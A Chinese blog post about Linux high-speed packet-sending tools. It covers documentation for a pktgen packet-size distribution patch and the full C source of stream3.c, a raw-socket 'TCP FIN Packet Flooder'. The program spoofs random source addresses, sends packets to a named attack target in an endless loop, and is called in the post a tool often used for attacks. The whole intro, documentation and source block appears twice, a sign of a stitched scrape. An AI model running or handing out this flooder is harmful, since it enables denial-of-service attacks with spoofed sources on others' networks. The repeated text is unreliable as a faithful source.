Linux网络发包工具PK
2013-02-25 18:35
267 查看
如果想做模仿网络攻击的测试,选择高速小包发送工具,最好还是可以指定协议的。当然,我们研究这些可不是打算用来攻击他人的机器,搞网络破坏的,而是用来通过该方法测试收数据体验一下被攻击的感觉,哈哈,也顺便衡量一下机器的性能。这方面smartbit测试仪可以完全可以满足。可惜啊,一台都得好几十万,对于大多数人来说都不太划算。那么还有没有软件的发包工具可以实现高速按指定协议发送数据包啊?!有。还是要归功于linux的开源精神的许多网络黑客的无私奉献。我们可以采用linux内核自带的发包工具pktgen,或者经常被用来进行网络攻击的stream源代码。
不过目前stream.c是比较老的版本了,现在我们可以使用改进而来的stream3.c或stream3o.c来完成我们的发包任务,很不错啊,在源码里面修改for循环的次数,就可以指定发包数量。然后编译源码运行,指定自己想要的参数,就可以达到目的了。呵呵!
The packet size distribution
enhancement of the
Linux Kernel Packet Generator:
----------------------------------------------------------
Table of Contents:
I. How it
works
II. How to
use the new enhancements
III. How to
install this module
IV. What i
have change in the code
First of all I want to mention that this patch was only tested on a
x86
PC with a v2.6.8 Linux Kernel. But please report problems to
me:
fabian_at_net.in.tum.de (substitute "_at_" with "@")
I. How it works:
-----------------
When a new packet shall be generated, a new packet size has to
be
determined. Therefore we randomly choose an entry of the (so
called)
outliers array. This array contains packet size values of those
packet
sizes which appear very often in the distribution which shall
be
represented. If we read a -1 in this array, none of these packet
sizes
is choosen, therefore we need to choose randomly again. But this
time we
use another array---the so called histos array. In this array the
entrys
are the lowest packet size of the bin which it is representing. For
this
reason we need to add random jitter of maximal the width of such a
bin
(called hist_width below) to this obtained packet size.
II. How to use the new enhancements:
------------------------------------
1. Read the original pktgen.txt
2. The following three new commands for the /proc interface were
added:
dist:
pgset "dist
1000 20 1500 33 75"
This is used
to set up the Linux Kernel Packet Generator for excepting
the
distributions entered by the "outl" and "hist" commands. The
syntax
is: dist
<precision>
<hist_width>
<max_pkt_size>
<#outliers>
<#histos>
With
<precision> the size of the array
used for generating the
different
packet sizes is set. This is directly influencing how high
the
resolution of the different entrys is.
The
<hist_width> sets the width of a
bin.
The
<max_pkt_size> sets the maximum
packet size.
The
<#outliers> and
<#histos> define how many lines of
"oult" and
"hist" have
to follow until the input distribution is complete.
outl:
pgset "outl
40 179"
Syntax: outl
<pkt_size>
<#cells>
This
instructs the Generator to fill
<#cells> of the outliers array
with the
packet size <pkt_size>
hist:
pgset "hist
40 91"
Syntax: hist
<pkt_size>
<#cells>
This
instructs the Generator to fill
<#cells> of the histos array
with the
packet size <pkt_size>, to which
jitter will be added.
3. To activate the distribution you have to switch the PKTSIZE_REAL
flag
pgset "flag
PKTSIZE_REAL". This will only succeed if the distribution
is complete
and correct, indicated with the DIST_READY flag.
III. How to install this module:
--------------------------------
1. Download the source code:
http://www.net.in.tum.de/~schneifa/sources/pktgen-lkpg-dist-0.1.tar.gz
2. unpack the tar archive:
tar -xvzf
pktgen-lkpg-dist-0.1.tar.gz
3. Copy the new pktgen.c over the old:
cp
pktgen-lkpg-dist-0.1/pktgen.c
/usr/src/linux/net/core/pktgen.c
4. Compile the new pktgen.c:
cd
/usr/src/linux/net/core
make -C
/usr/src/linux SUBDIRS=$PWD modules
5. Install the new module:
cd
/usr/src/linux
make
modules_install
6. use it!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __F***OR_BSD
#define __F***OR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
struct ip_hdr {
u_int
ip_hl:4,
ip_v:4;
u_char
ip_tos;
u_short
ip_len;
u_short
ip_id;
u_short
ip_off;
u_char
ip_ttl;
u_char
ip_p;
u_short
ip_sum;
u_long
saddr,
daddr;
};
struct tcp_hdr {
u_short
th_sport;
u_short
th_dport;
u_long
th_seq;
u_long
th_ack;
u_int
th_x2:4,
th_off:4;
u_char
th_flags;
u_short
th_win;
u_short
th_sum;
u_short
th_urp;
};
struct tcpopt_hdr {
u_char
type;
u_char
len;
u_short
value;
};
struct pseudo_hdr
{
u_long
saddr,
daddr;
u_char mbz,
ptcl;
u_short
tcpl;
};
struct packet {
struct ip
ip;
struct
tcphdr tcp;
};
struct cksum {
struct
pseudo_hdr pseudo;
struct
tcphdr tcp;
};
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;
void usage(char *progname)
{
fprintf(stderr, "Usage: %s <dstaddr>
<dstport>
<pktsize>
<pps>\n",
progname);
fprintf(stderr,
"
dstaddr - the target we are trying to
attack.\n");
fprintf(stderr,
"
dstport - the port of the target, 0 =
random.\n");
fprintf(stderr,
"
pktsize - the extra size to
use. 0 = normal syn.\n");
exit(1);
}
inline u_short in_cksum(u_short *addr, int len)
{
register int
nleft = len;
register
u_short *w = addr;
register int
sum = 0;
u_short
answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum
& 0xffff);
sum += (sum >>
16);
answer =
~sum;
return(answer);
}
u_long lookup(char *hostname)
{
struct
hostent *hp;
if ((hp =
gethostbyname(hostname)) == NULL) {
fprintf(stderr, "Could not resolve %s.\n", hostname);
exit(1);
}
return
*(u_long *)hp->h_addr;
}
void flooder(void)
{
struct
timespec ts;
int i;
memset(&packet, 0, sizeof(packet));
ts.tv_sec
= 0;
ts.tv_nsec
= 10;
packet.ip.ip_hl
= 5;
packet.ip.ip_v
= 4;
packet.ip.ip_p
= IPPROTO_TCP;
packet.ip.ip_tos
= 0x08;
packet.ip.ip_id
= rand();
packet.ip.ip_len
= FIX(sizeof(packet));
packet.ip.ip_off
= 0;
packet.ip.ip_ttl
= 255;
packet.ip.ip_dst.s_addr
= dstaddr;
packet.ip.ip_src.s_addr
= random();
packet.ip.ip_sum
= 0;
packet.tcp.th_sum
= 0;
packet.tcp.th_win
= htons(16384);
packet.tcp.th_seq
= random();
packet.tcp.th_ack
= 0;
packet.tcp.th_off
= 5;
packet.tcp.th_urp
= 0;
packet.tcp.th_ack
=
rand();
packet.tcp.th_flags
=
TH_ACK|TH_FIN;
packet.tcp.th_sport
=
rand();
packet.tcp.th_dport
= dstport?htons(dstport):rand();
s_in.sin_family
= AF_INET;
s_in.sin_port
= packet.tcp.th_dport;
s_in.sin_addr.s_addr
= dstaddr;
cksum.pseudo.daddr
= dstaddr;
cksum.pseudo.saddr
=
packet.ip.ip_src.s_addr;
cksum.pseudo.mbz
= 0;
cksum.pseudo.ptcl
= IPPROTO_TCP;
cksum.pseudo.tcpl
= htons(sizeof(struct tcphdr));
cksum.tcp
= packet.tcp;
packet.ip.ip_sum
= in_cksum((void *)&packet.ip, 20);
packet.tcp.th_sum
= in_cksum((void *)&cksum, sizeof(cksum));
for(i=0;;++i) {
if (sendto(sock, &packet, sizeof(packet), 0,
(struct sockaddr
*)&s_in, sizeof(s_in)) < 0)
perror("jess");
}
}
int main(int argc, char *argv[])
{
int on =
1;
printf("stream3.c v0.01 - TCP FIN Packet Flooder\n modified by
3APA3A@security.nnov.ru\n");
if ((sock =
socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(1);
}
setgid(getgid()); setuid(getuid());
if (argc
< 4)
usage(argv[0]);
if
(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char
*)&on, sizeof(on))
< 0) {
perror("setsockopt");
exit(1);
}
srand((time(NULL) ^ getpid()) + getppid());
printf("\nResolving IPs..."); fflush(stdout);
dstaddr
= lookup(argv[1]);
dstport
= atoi(argv[2]);
pktsize
= atoi(argv[3]);
printf("Sending..."); fflush(stdout);
flooder();
return
0;
}
不过目前stream.c是比较老的版本了,现在我们可以使用改进而来的stream3.c或stream3o.c来完成我们的发包任务,很不错啊,在源码里面修改for循环的次数,就可以指定发包数量。然后编译源码运行,指定自己想要的参数,就可以达到目的了。呵呵!
The packet size distribution
enhancement of the
Linux Kernel Packet Generator:
----------------------------------------------------------
Table of Contents:
I. How it
works
II. How to
use the new enhancements
III. How to
install this module
IV. What i
have change in the code
First of all I want to mention that this patch was only tested on a
x86
PC with a v2.6.8 Linux Kernel. But please report problems to
me:
fabian_at_net.in.tum.de (substitute "_at_" with "@")
I. How it works:
-----------------
When a new packet shall be generated, a new packet size has to
be
determined. Therefore we randomly choose an entry of the (so
called)
outliers array. This array contains packet size values of those
packet
sizes which appear very often in the distribution which shall
be
represented. If we read a -1 in this array, none of these packet
sizes
is choosen, therefore we need to choose randomly again. But this
time we
use another array---the so called histos array. In this array the
entrys
are the lowest packet size of the bin which it is representing. For
this
reason we need to add random jitter of maximal the width of such a
bin
(called hist_width below) to this obtained packet size.
II. How to use the new enhancements:
------------------------------------
1. Read the original pktgen.txt
2. The following three new commands for the /proc interface were
added:
dist:
pgset "dist
1000 20 1500 33 75"
This is used
to set up the Linux Kernel Packet Generator for excepting
the
distributions entered by the "outl" and "hist" commands. The
syntax
is: dist
<precision>
<hist_width>
<max_pkt_size>
<#outliers>
<#histos>
With
<precision> the size of the array
used for generating the
different
packet sizes is set. This is directly influencing how high
the
resolution of the different entrys is.
The
<hist_width> sets the width of a
bin.
The
<max_pkt_size> sets the maximum
packet size.
The
<#outliers> and
<#histos> define how many lines of
"oult" and
"hist" have
to follow until the input distribution is complete.
outl:
pgset "outl
40 179"
Syntax: outl
<pkt_size>
<#cells>
This
instructs the Generator to fill
<#cells> of the outliers array
with the
packet size <pkt_size>
hist:
pgset "hist
40 91"
Syntax: hist
<pkt_size>
<#cells>
This
instructs the Generator to fill
<#cells> of the histos array
with the
packet size <pkt_size>, to which
jitter will be added.
3. To activate the distribution you have to switch the PKTSIZE_REAL
flag
pgset "flag
PKTSIZE_REAL". This will only succeed if the distribution
is complete
and correct, indicated with the DIST_READY flag.
III. How to install this module:
--------------------------------
1. Download the source code:
http://www.net.in.tum.de/~schneifa/sources/pktgen-lkpg-dist-0.1.tar.gz
2. unpack the tar archive:
tar -xvzf
pktgen-lkpg-dist-0.1.tar.gz
3. Copy the new pktgen.c over the old:
cp
pktgen-lkpg-dist-0.1/pktgen.c
/usr/src/linux/net/core/pktgen.c
4. Compile the new pktgen.c:
cd
/usr/src/linux/net/core
make -C
/usr/src/linux SUBDIRS=$PWD modules
5. Install the new module:
cd
/usr/src/linux
make
modules_install
6. use it!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#ifndef __F***OR_BSD
#define __F***OR_BSD
#endif
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#ifdef LINUX
#define FIX(x) htons(x)
#else
#define FIX(x) (x)
#endif
struct ip_hdr {
u_int
ip_hl:4,
ip_v:4;
u_char
ip_tos;
u_short
ip_len;
u_short
ip_id;
u_short
ip_off;
u_char
ip_ttl;
u_char
ip_p;
u_short
ip_sum;
u_long
saddr,
daddr;
};
struct tcp_hdr {
u_short
th_sport;
u_short
th_dport;
u_long
th_seq;
u_long
th_ack;
u_int
th_x2:4,
th_off:4;
u_char
th_flags;
u_short
th_win;
u_short
th_sum;
u_short
th_urp;
};
struct tcpopt_hdr {
u_char
type;
u_char
len;
u_short
value;
};
struct pseudo_hdr
{
u_long
saddr,
daddr;
u_char mbz,
ptcl;
u_short
tcpl;
};
struct packet {
struct ip
ip;
struct
tcphdr tcp;
};
struct cksum {
struct
pseudo_hdr pseudo;
struct
tcphdr tcp;
};
struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short dstport, pktsize, pps;
u_long dstaddr;
int sock;
void usage(char *progname)
{
fprintf(stderr, "Usage: %s <dstaddr>
<dstport>
<pktsize>
<pps>\n",
progname);
fprintf(stderr,
"
dstaddr - the target we are trying to
attack.\n");
fprintf(stderr,
"
dstport - the port of the target, 0 =
random.\n");
fprintf(stderr,
"
pktsize - the extra size to
use. 0 = normal syn.\n");
exit(1);
}
inline u_short in_cksum(u_short *addr, int len)
{
register int
nleft = len;
register
u_short *w = addr;
register int
sum = 0;
u_short
answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum
& 0xffff);
sum += (sum >>
16);
answer =
~sum;
return(answer);
}
u_long lookup(char *hostname)
{
struct
hostent *hp;
if ((hp =
gethostbyname(hostname)) == NULL) {
fprintf(stderr, "Could not resolve %s.\n", hostname);
exit(1);
}
return
*(u_long *)hp->h_addr;
}
void flooder(void)
{
struct
timespec ts;
int i;
memset(&packet, 0, sizeof(packet));
ts.tv_sec
= 0;
ts.tv_nsec
= 10;
packet.ip.ip_hl
= 5;
packet.ip.ip_v
= 4;
packet.ip.ip_p
= IPPROTO_TCP;
packet.ip.ip_tos
= 0x08;
packet.ip.ip_id
= rand();
packet.ip.ip_len
= FIX(sizeof(packet));
packet.ip.ip_off
= 0;
packet.ip.ip_ttl
= 255;
packet.ip.ip_dst.s_addr
= dstaddr;
packet.ip.ip_src.s_addr
= random();
packet.ip.ip_sum
= 0;
packet.tcp.th_sum
= 0;
packet.tcp.th_win
= htons(16384);
packet.tcp.th_seq
= random();
packet.tcp.th_ack
= 0;
packet.tcp.th_off
= 5;
packet.tcp.th_urp
= 0;
packet.tcp.th_ack
=
rand();
packet.tcp.th_flags
=
TH_ACK|TH_FIN;
packet.tcp.th_sport
=
rand();
packet.tcp.th_dport
= dstport?htons(dstport):rand();
s_in.sin_family
= AF_INET;
s_in.sin_port
= packet.tcp.th_dport;
s_in.sin_addr.s_addr
= dstaddr;
cksum.pseudo.daddr
= dstaddr;
cksum.pseudo.saddr
=
packet.ip.ip_src.s_addr;
cksum.pseudo.mbz
= 0;
cksum.pseudo.ptcl
= IPPROTO_TCP;
cksum.pseudo.tcpl
= htons(sizeof(struct tcphdr));
cksum.tcp
= packet.tcp;
packet.ip.ip_sum
= in_cksum((void *)&packet.ip, 20);
packet.tcp.th_sum
= in_cksum((void *)&cksum, sizeof(cksum));
for(i=0;;++i) {
if (sendto(sock, &packet, sizeof(packet), 0,
(struct sockaddr
*)&s_in, sizeof(s_in)) < 0)
perror("jess");
}
}
int main(int argc, char *argv[])
{
int on =
1;
printf("stream3.c v0.01 - TCP FIN Packet Flooder\n modified by
3APA3A@security.nnov.ru\n");
if ((sock =
socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(1);
}
setgid(getgid()); setuid(getuid());
if (argc
< 4)
usage(argv[0]);
if
(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char
*)&on, sizeof(on))
< 0) {
perror("setsockopt");
exit(1);
}
srand((time(NULL) ^ getpid()) + getppid());
printf("\nResolving IPs..."); fflush(stdout);
dstaddr
= lookup(argv[1]);
dstport
= atoi(argv[2]);
pktsize
= atoi(argv[3]);
printf("Sending..."); fflush(stdout);
flooder();
return
0;
}
相关文章推荐
- linux下网络发包工具(cp过来的)
- linux下网络发包工具
- linux 常用网络工具
- 20个你可能不知道的 Linux 网络工具
- 三款轻量级Linux 网络监视工具
- Linux下网络流量实时监控工具大全
- Linux学习之CentOS(二)----centos连接网络的三种方式及 远程登录管理工具SecureCRT的使用
- 【Unix/Linux】【命令】【网络操作工具】远程拷贝文件 —— rcp命令
- Linux下的网络管理工具—OpenNMS
- Linux无线网络实用工具Top 10
- Linux网络统计工具/命令
- Linux网络抓包工具——tcpdump
- linux网络编程之System V 信号量(一):封装一个信号量集操作函数的工具
- nload-linux命令行查看网络流量工具
- 网络编程 Linux统计/监控工具SAR详细介绍
- Linux网络设置3——ssh工具使用的注意点
- Linux命令大全(五)--Linux网络通信工具
- linux网络测速工具Speedometer(嵌入式工具集合)
- linux网络性能测试工具Iperf使用介绍
- 【转】Linux下进程/程序网络带宽占用情况查看工具 -- NetHogs